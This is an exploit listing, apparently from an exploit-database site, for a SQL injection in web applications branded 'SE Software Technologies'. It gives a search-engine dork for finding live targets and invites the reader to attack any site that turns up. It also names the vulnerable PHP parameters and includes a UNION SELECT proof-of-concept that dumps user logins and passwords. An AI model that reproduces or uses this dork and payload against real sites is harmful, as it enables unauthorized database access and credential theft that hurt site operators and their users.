SE Software Technologies suffers from a remote SQL injection vulnerability.
55e2527e04b3dd937b6c340e1c1d15332b0a0cd8c58364aa23c1e143136b0a4c
#(+)Exploit Title: SE Software Technologies Sensitive Database Disclosure Vulnerability
#(+)Author : ^Xecuti0n3r
#(+) Date : 26.04.2011
#(+) Hour : 13:37 PM
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) dork : intext:"Powered By : SE Software Technologies" filetype:php
#(+) Category : Web Apps [SQli]
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
____________________________________________________________________
____________________________________________________________________
Choose any site that comes up when you enter the dork intext:"Powered By : SE Software Technologies" filetype:php in search engine
*SQL injection Vulnerability*
# [+]http://site.com/files.php?id='5
# [+]http://site.com/files.php?id=[SQLi]
# [+]http://site.com/page.php?data='27
# [+]http://site.com/page.php?data=[SQLi]
# [+]http://site.com/details.php?product_id='786
# [+]http://site.com/setails.php?product_id=[SQLi]
# [+]http://site.com/contactus.php?data='5
# [+]http://site.com/contactus.php?data=[SQLi]
#POC: http://site.com/files.php?id=-5 union select 1,group_concat(user_id,0x3a,login,0x3a,password)+from+users--
____________________________________________________________________
____________________________________________________________________
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)
(+)<3 to :Indian Cyber Army & Indishell Crew
##################################################################